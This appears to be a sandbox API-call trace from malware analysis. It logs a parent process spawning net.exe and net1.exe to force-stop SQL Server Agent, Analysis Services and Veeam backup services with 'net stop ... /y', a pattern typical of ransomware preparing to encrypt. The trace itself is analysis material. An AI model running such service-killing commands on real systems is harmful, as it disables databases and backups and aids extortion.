_wcsicmp (_String1="config", _String2="SQLAgent$PROD") returned -16 [0219.208] _wcsicmp (_String1="continue", _String2="SQLAgent$PROD") returned -16 [0219.208] _wcsicmp (_String1="cont", _String2="SQLAgent$PROD") returned -16 [0219.209] _wcsicmp (_String1="file", _String2="SQLAgent$PROD") returned -13 [0219.209] _wcsicmp (_String1="files", _String2="SQLAgent$PROD") returned -13 [0219.209] _wcsicmp (_String1="group", _String2="SQLAgent$PROD") returned -12 [0219.209] _wcsicmp (_String1="groups", _String2="SQLAgent$PROD") returned -12 [0219.209] _wcsicmp (_String1="help", _String2="SQLAgent$PROD") returned -11 [0219.209] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$PROD") returned -11 [0219.209] _wcsicmp (_String1="localgroup", _String2="SQLAgent$PROD") returned -7 [0219.209] _wcsicmp (_String1="pause", _String2="SQLAgent$PROD") returned -3 [0219.209] _wcsicmp (_String1="session", _String2="SQLAgent$PROD") returned -12 [0219.209] _wcsicmp (_String1="sessions", _String2="SQLAgent$PROD") returned -12 [0219.209] _wcsicmp (_String1="sess", _String2="SQLAgent$PROD") returned -12 [0219.209] _wcsicmp (_String1="share", _String2="SQLAgent$PROD") returned -9 [0219.209] _wcsicmp (_String1="start", _String2="SQLAgent$PROD") returned 3 [0219.209] _wcsicmp (_String1="stats", _String2="SQLAgent$PROD") returned 3 [0219.209] _wcsicmp (_String1="statistics", _String2="SQLAgent$PROD") returned 3 [0219.209] _wcsicmp (_String1="stop", _String2="SQLAgent$PROD") returned 3 [0219.209] _wcsicmp (_String1="time", _String2="SQLAgent$PROD") returned 1 [0219.209] _wcsicmp (_String1="user", _String2="SQLAgent$PROD") returned 2 [0219.209] _wcsicmp (_String1="users", _String2="SQLAgent$PROD") returned 2 [0219.209] _wcsicmp (_String1="msg", _String2="SQLAgent$PROD") returned -6 [0219.209] _wcsicmp (_String1="messenger", _String2="SQLAgent$PROD") returned -6 [0219.209] _wcsicmp (_String1="receiver", _String2="SQLAgent$PROD") returned -1 [0219.209] _wcsicmp (_String1="rcv", _String2="SQLAgent$PROD") returned -1 [0219.209] _wcsicmp (_String1="netpopup", _String2="SQLAgent$PROD") returned -5 [0219.209] _wcsicmp (_String1="redirector", _String2="SQLAgent$PROD") returned -1 [0219.209] _wcsicmp (_String1="redir", _String2="SQLAgent$PROD") returned -1 [0219.209] _wcsicmp (_String1="rdr", _String2="SQLAgent$PROD") returned -1 [0219.209] _wcsicmp (_String1="workstation", _String2="SQLAgent$PROD") returned 4 [0219.209] _wcsicmp (_String1="work", _String2="SQLAgent$PROD") returned 4 [0219.209] _wcsicmp (_String1="wksta", _String2="SQLAgent$PROD") returned 4 [0219.209] _wcsicmp (_String1="prdr", _String2="SQLAgent$PROD") returned -3 [0219.209] _wcsicmp (_String1="devrdr", _String2="SQLAgent$PROD") returned -15 [0219.209] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$PROD") returned -7 [0219.209] _wcsicmp (_String1="server", _String2="SQLAgent$PROD") returned -12 [0219.209] _wcsicmp (_String1="svr", _String2="SQLAgent$PROD") returned 5 [0219.209] _wcsicmp (_String1="srv", _String2="SQLAgent$PROD") returned 1 [0219.210] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$PROD") returned -7 [0219.210] _wcsicmp (_String1="alerter", _String2="SQLAgent$PROD") returned -18 [0219.210] _wcsicmp (_String1="netlogon", _String2="SQLAgent$PROD") returned -5 [0219.210] _wcsupr (in: _String="SQLAgent$PROD" | out: _String="SQLAGENT$PROD") returned="SQLAGENT$PROD" [0219.210] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2c54d0 [0219.212] GetServiceKeyNameW (in: hSCManager=0x2c54d0, lpDisplayName="SQLAGENT$PROD", lpServiceName=0x75aaf0, lpcchBuffer=0x1cf79c | out: lpServiceName="", lpcchBuffer=0x1cf79c) returned 0 [0219.213] _wcsicmp (_String1="msg", _String2="SQLAGENT$PROD") returned -6 [0219.213] _wcsicmp (_String1="messenger", _String2="SQLAGENT$PROD") returned -6 [0219.213] _wcsicmp (_String1="receiver", _String2="SQLAGENT$PROD") returned -1 [0219.213] _wcsicmp (_String1="rcv", _String2="SQLAGENT$PROD") returned -1 [0219.213] _wcsicmp (_String1="redirector", _String2="SQLAGENT$PROD") returned -1 [0219.213] _wcsicmp (_String1="redir", _String2="SQLAGENT$PROD") returned -1 [0219.213] _wcsicmp (_String1="rdr", _String2="SQLAGENT$PROD") returned -1 [0219.213] _wcsicmp (_String1="workstation", _String2="SQLAGENT$PROD") returned 4 [0219.213] _wcsicmp (_String1="work", _String2="SQLAGENT$PROD") returned 4 [0219.213] _wcsicmp (_String1="wksta", _String2="SQLAGENT$PROD") returned 4 [0219.213] _wcsicmp (_String1="prdr", _String2="SQLAGENT$PROD") returned -3 [0219.213] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$PROD") returned -15 [0219.213] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$PROD") returned -7 [0219.213] _wcsicmp (_String1="server", _String2="SQLAGENT$PROD") returned -12 [0219.213] _wcsicmp (_String1="svr", _String2="SQLAGENT$PROD") returned 5 [0219.213] _wcsicmp (_String1="srv", _String2="SQLAGENT$PROD") returned 1 [0219.213] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$PROD") returned -7 [0219.213] _wcsicmp (_String1="alerter", _String2="SQLAGENT$PROD") returned -18 [0219.213] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$PROD") returned -5 [0219.213] NetServiceControl (in: servername=0x0, service="SQLAGENT$PROD", opcode=0x0, arg=0x0, bufptr=0x1cf798 | out: bufptr=0x1cf798) returned 0x889 [0219.214] wcscpy_s (in: _Destination=0x75a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0219.214] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0219.215] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x75b338, nSize=0x800, Arguments=0x759dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0219.216] GetFileType (hFile=0x26c) returned 0x3 [0219.216] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2c4000 [0219.216] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2c4000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0219.216] WriteFile (in: hFile=0x26c, lpBuffer=0x2c4000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1cf6d8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf6d8, lpOverlapped=0x0) returned 0 [0219.216] LocalFree (hMem=0x2c4000) returned 0x0 [0219.216] GetFileType (hFile=0x26c) returned 0x3 [0219.217] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2c62a8 [0219.217] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2c62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n,", lpUsedDefaultChar=0x0) returned 2 [0219.217] WriteFile (in: hFile=0x26c, lpBuffer=0x2c62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf6d8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf6d8, lpOverlapped=0x0) returned 0 [0219.217] LocalFree (hMem=0x2c62a8) returned 0x0 [0219.217] _ultow (in: _Dest=0x889, _Radix=1898248 | out: _Dest=0x889) returned="2185" [0219.217] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x75b338, nSize=0x800, Arguments=0x759dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0219.217] GetFileType (hFile=0x26c) returned 0x3 [0219.217] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2c62a8 [0219.217] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2c62a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0219.217] WriteFile (in: hFile=0x26c, lpBuffer=0x2c62a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1cf6e4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf6e4, lpOverlapped=0x0) returned 0 [0219.217] LocalFree (hMem=0x2c62a8) returned 0x0 [0219.217] GetFileType (hFile=0x26c) returned 0x3 [0219.217] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2c62a8 [0219.217] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2c62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n,", lpUsedDefaultChar=0x0) returned 2 [0219.217] WriteFile (in: hFile=0x26c, lpBuffer=0x2c62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf6e4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf6e4, lpOverlapped=0x0) returned 0 [0219.217] LocalFree (hMem=0x2c62a8) returned 0x0 [0219.218] NetApiBufferFree (Buffer=0x2c1c70) returned 0x0 [0219.218] NetApiBufferFree (Buffer=0x2c1c88) returned 0x0 [0219.218] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$PROD /y" [0219.218] exit (_Code=2) Process: id = "386" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x54f89000" os_pid = "0x8d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSOLAP$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 562 os_tid = 0x8f8 Process: id = "387" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x54478000" os_pid = "0xa68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "386" os_parent_pid = "0x8d4" cmd_line = "C:\\Windows\\system32\\net1 stop MSOLAP$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 563 os_tid = 0x970 [0219.447] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32f938 | out: lpSystemTimeAsFileTime=0x32f938*(dwLowDateTime=0x4bfc76e0, dwHighDateTime=0x1d57a87)) [0219.447] GetCurrentProcessId () returned 0xa68 [0219.447] GetCurrentThreadId () returned 0x970 [0219.447] GetTickCount () returned 0x1170648 [0219.447] QueryPerformanceCounter (in: lpPerformanceCount=0x32f930 | out: lpPerformanceCount=0x32f930*=33973159218) returned 1 [0219.447] GetModuleHandleA (lpModuleName=0x0) returned 0x560000 [0219.447] __set_app_type (_Type=0x1) [0219.447] __p__fmode () returned 0x74eb31f4 [0219.447] __p__commode () returned 0x74eb31fc [0219.448] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x56ffe6) returned 0x0 [0219.448] __getmainargs (in: _Argc=0x579064, _Argv=0x57906c, _Env=0x579068, _DoWildCard=0, _StartInfo=0x579024 | out: _Argc=0x579064, _Argv=0x57906c, _Env=0x579068) returned 0 [0219.448] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0219.448] GetConsoleOutputCP () returned 0x1b5 [0219.448] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x579080 | out: lpCPInfo=0x579080) returned 1 [0219.448] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.451] sprintf_s (in: _DstBuf=0x32f8f0, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0219.452] setlocale (category=0, locale=".437") returned="English_United States.437" [0219.454] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0219.454] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0219.454] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$TPS /y" [0219.454] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x32f6bc, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0219.454] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x0, Size=0x68) returned 0x3a3c10 [0219.454] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0219.454] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x32f8c0 | out: Buffer=0x32f8c0*=0x3a1c70) returned 0x0 [0219.454] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x32f8c0 | out: Buffer=0x32f8c0*=0x3a1c88) returned 0x0 [0219.455] _fileno (_File=0x74eb2900) returned -2 [0219.455] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0219.455] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0219.455] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0219.455] _wcsicmp (_String1="config", _String2="stop") returned -16 [0219.455] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0219.455] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0219.455] _wcsicmp (_String1="file", _String2="stop") returned -13 [0219.455] _wcsicmp (_String1="files", _String2="stop") returned -13 [0219.455] _wcsicmp (_String1="group", _String2="stop") returned -12 [0219.455] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0219.455] _wcsicmp (_String1="help", _String2="stop") returned -11 [0219.455] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0219.455] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0219.455] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0219.455] _wcsicmp (_String1="session", _String2="stop") returned -15 [0219.455] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0219.455] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0219.455] _wcsicmp (_String1="share", _String2="stop") returned -12 [0219.455] _wcsicmp (_String1="start", _String2="stop") returned -14 [0219.455] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0219.455] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0219.455] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0219.455] _wcsicmp (_String1="accounts", _String2="MSOLAP$TPS") returned -12 [0219.455] _wcsicmp (_String1="computer", _String2="MSOLAP$TPS") returned -10 [0219.455] _wcsicmp (_String1="config", _String2="MSOLAP$TPS") returned -10 [0219.455] _wcsicmp (_String1="continue", _String2="MSOLAP$TPS") returned -10 [0219.455] _wcsicmp (_String1="cont", _String2="MSOLAP$TPS") returned -10 [0219.455] _wcsicmp (_String1="file", _String2="MSOLAP$TPS") returned -7 [0219.455] _wcsicmp (_String1="files", _String2="MSOLAP$TPS") returned -7 [0219.455] _wcsicmp (_String1="group", _String2="MSOLAP$TPS") returned -6 [0219.455] _wcsicmp (_String1="groups", _String2="MSOLAP$TPS") returned -6 [0219.455] _wcsicmp (_String1="help", _String2="MSOLAP$TPS") returned -5 [0219.456] _wcsicmp (_String1="helpmsg", _String2="MSOLAP$TPS") returned -5 [0219.456] _wcsicmp (_String1="localgroup", _String2="MSOLAP$TPS") returned -1 [0219.456] _wcsicmp (_String1="pause", _String2="MSOLAP$TPS") returned 3 [0219.456] _wcsicmp (_String1="session", _String2="MSOLAP$TPS") returned 6 [0219.456] _wcsicmp (_String1="sessions", _String2="MSOLAP$TPS") returned 6 [0219.456] _wcsicmp (_String1="sess", _String2="MSOLAP$TPS") returned 6 [0219.456] _wcsicmp (_String1="share", _String2="MSOLAP$TPS") returned 6 [0219.456] _wcsicmp (_String1="start", _String2="MSOLAP$TPS") returned 6 [0219.456] _wcsicmp (_String1="stats", _String2="MSOLAP$TPS") returned 6 [0219.456] _wcsicmp (_String1="statistics", _String2="MSOLAP$TPS") returned 6 [0219.456] _wcsicmp (_String1="stop", _String2="MSOLAP$TPS") returned 6 [0219.456] _wcsicmp (_String1="time", _String2="MSOLAP$TPS") returned 7 [0219.456] _wcsicmp (_String1="user", _String2="MSOLAP$TPS") returned 8 [0219.456] _wcsicmp (_String1="users", _String2="MSOLAP$TPS") returned 8 [0219.456] _wcsicmp (_String1="msg", _String2="MSOLAP$TPS") returned -8 [0219.456] _wcsicmp (_String1="messenger", _String2="MSOLAP$TPS") returned -14 [0219.456] _wcsicmp (_String1="receiver", _String2="MSOLAP$TPS") returned 5 [0219.456] _wcsicmp (_String1="rcv", _String2="MSOLAP$TPS") returned 5 [0219.456] _wcsicmp (_String1="netpopup", _String2="MSOLAP$TPS") returned 1 [0219.456] _wcsicmp (_String1="redirector", _String2="MSOLAP$TPS") returned 5 [0219.456] _wcsicmp (_String1="redir", _String2="MSOLAP$TPS") returned 5 [0219.456] _wcsicmp (_String1="rdr", _String2="MSOLAP$TPS") returned 5 [0219.456] _wcsicmp (_String1="workstation", _String2="MSOLAP$TPS") returned 10 [0219.456] _wcsicmp (_String1="work", _String2="MSOLAP$TPS") returned 10 [0219.456] _wcsicmp (_String1="wksta", _String2="MSOLAP$TPS") returned 10 [0219.456] _wcsicmp (_String1="prdr", _String2="MSOLAP$TPS") returned 3 [0219.456] _wcsicmp (_String1="devrdr", _String2="MSOLAP$TPS") returned -9 [0219.456] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$TPS") returned -1 [0219.456] _wcsicmp (_String1="server", _String2="MSOLAP$TPS") returned 6 [0219.456] _wcsicmp (_String1="svr", _String2="MSOLAP$TPS") returned 6 [0219.456] _wcsicmp (_String1="srv", _String2="MSOLAP$TPS") returned 6 [0219.456] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$TPS") returned -1 [0219.456] _wcsicmp (_String1="alerter", _String2="MSOLAP$TPS") returned -12 [0219.456] _wcsicmp (_String1="netlogon", _String2="MSOLAP$TPS") returned 1 [0219.457] _wcsupr (in: _String="MSOLAP$TPS" | out: _String="MSOLAP$TPS") returned="MSOLAP$TPS" [0219.457] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3a54c8 [0219.459] GetServiceKeyNameW (in: hSCManager=0x3a54c8, lpDisplayName="MSOLAP$TPS", lpServiceName=0x57aaf0, lpcchBuffer=0x32f85c | out: lpServiceName="", lpcchBuffer=0x32f85c) returned 0 [0219.460] _wcsicmp (_String1="msg", _String2="MSOLAP$TPS") returned -8 [0219.460] _wcsicmp (_String1="messenger", _String2="MSOLAP$TPS") returned -14 [0219.460] _wcsicmp (_String1="receiver", _String2="MSOLAP$TPS") returned 5 [0219.460] _wcsicmp (_String1="rcv", _String2="MSOLAP$TPS") returned 5 [0219.460] _wcsicmp (_String1="redirector", _String2="MSOLAP$TPS") returned 5 [0219.460] _wcsicmp (_String1="redir", _String2="MSOLAP$TPS") returned 5 [0219.460] _wcsicmp (_String1="rdr", _String2="MSOLAP$TPS") returned 5 [0219.460] _wcsicmp (_String1="workstation", _String2="MSOLAP$TPS") returned 10 [0219.460] _wcsicmp (_String1="work", _String2="MSOLAP$TPS") returned 10 [0219.460] _wcsicmp (_String1="wksta", _String2="MSOLAP$TPS") returned 10 [0219.460] _wcsicmp (_String1="prdr", _String2="MSOLAP$TPS") returned 3 [0219.460] _wcsicmp (_String1="devrdr", _String2="MSOLAP$TPS") returned -9 [0219.460] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$TPS") returned -1 [0219.460] _wcsicmp (_String1="server", _String2="MSOLAP$TPS") returned 6 [0219.460] _wcsicmp (_String1="svr", _String2="MSOLAP$TPS") returned 6 [0219.460] _wcsicmp (_String1="srv", _String2="MSOLAP$TPS") returned 6 [0219.460] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$TPS") returned -1 [0219.460] _wcsicmp (_String1="alerter", _String2="MSOLAP$TPS") returned -12 [0219.460] _wcsicmp (_String1="netlogon", _String2="MSOLAP$TPS") returned 1 [0219.460] NetServiceControl (in: servername=0x0, service="MSOLAP$TPS", opcode=0x0, arg=0x0, bufptr=0x32f858 | out: bufptr=0x32f858) returned 0x889 [0219.461] wcscpy_s (in: _Destination=0x57a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0219.461] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0219.462] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x57b338, nSize=0x800, Arguments=0x579dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0219.463] GetFileType (hFile=0x26c) returned 0x3 [0219.463] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3a3ff8 [0219.463] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x3a3ff8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0219.463] WriteFile (in: hFile=0x26c, lpBuffer=0x3a3ff8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x32f798, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32f798, lpOverlapped=0x0) returned 0 [0219.463] LocalFree (hMem=0x3a3ff8) returned 0x0 [0219.463] GetFileType (hFile=0x26c) returned 0x3 [0219.464] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3a62a0 [0219.464] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3a62a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n:", lpUsedDefaultChar=0x0) returned 2 [0219.464] WriteFile (in: hFile=0x26c, lpBuffer=0x3a62a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x32f798, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32f798, lpOverlapped=0x0) returned 0 [0219.464] LocalFree (hMem=0x3a62a0) returned 0x0 [0219.464] _ultow (in: _Dest=0x889, _Radix=3340232 | out: _Dest=0x889) returned="2185" [0219.464] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x57b338, nSize=0x800, Arguments=0x579dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0219.464] GetFileType (hFile=0x26c) returned 0x3 [0219.464] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3a62a0 [0219.464] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3a62a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0219.464] WriteFile (in: hFile=0x26c, lpBuffer=0x3a62a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x32f7a4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32f7a4, lpOverlapped=0x0) returned 0 [0219.464] LocalFree (hMem=0x3a62a0) returned 0x0 [0219.464] GetFileType (hFile=0x26c) returned 0x3 [0219.464] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3a62a0 [0219.464] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3a62a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n:", lpUsedDefaultChar=0x0) returned 2 [0219.464] WriteFile (in: hFile=0x26c, lpBuffer=0x3a62a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x32f7a4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32f7a4, lpOverlapped=0x0) returned 0 [0219.464] LocalFree (hMem=0x3a62a0) returned 0x0 [0219.465] NetApiBufferFree (Buffer=0x3a1c70) returned 0x0 [0219.465] NetApiBufferFree (Buffer=0x3a1c88) returned 0x0 [0219.465] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$TPS /y" [0219.465] exit (_Code=2) Process: id = "388" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5478e000" os_pid = "0xa58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop VeeamDeploySvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 564 os_tid = 0x8fc Process: id = "389" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x53d1c000" os_pid = "0x8ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "388" os_parent_pid = "0xa58" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamDeploySvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 565 os_tid = 0x8e8 [0219.680] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f858 | out: lpSystemTimeAsFileTime=0x14f858*(dwLowDateTime=0x4c202b80, dwHighDateTime=0x1d57a87)) [0219.680] GetCurrentProcessId () returned 0x8ec [0219.680] GetCurrentThreadId () returned 0x8e8 [0219.680] GetTickCount () returned 0x1170732 [0219.680] QueryPerformanceCounter (in: lpPerformanceCount=0x14f850 | out: lpPerformanceCount=0x14f850*=33996491234) returned 1 [0219.681] GetModuleHandleA (lpModuleName=0x0) returned 0x8e0000 [0219.681] __set_app_type (_Type=0x1) [0219.681] __p__fmode () returned 0x74eb31f4 [0219.681] __p__commode () returned 0x74eb31fc [0219.681] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8effe6) returned 0x0 [0219.681] __getmainargs (in: _Argc=0x8f9064, _Argv=0x8f906c, _Env=0x8f9068, _DoWildCard=0, _StartInfo=0x8f9024 | out: _Argc=0x8f9064, _Argv=0x8f906c, _Env=0x8f9068) returned 0 [0219.681] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0219.681] GetConsoleOutputCP () returned 0x1b5 [0219.682] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x8f9080 | out: lpCPInfo=0x8f9080) returned 1 [0219.682] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.685] sprintf_s (in: _DstBuf=0x14f810, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 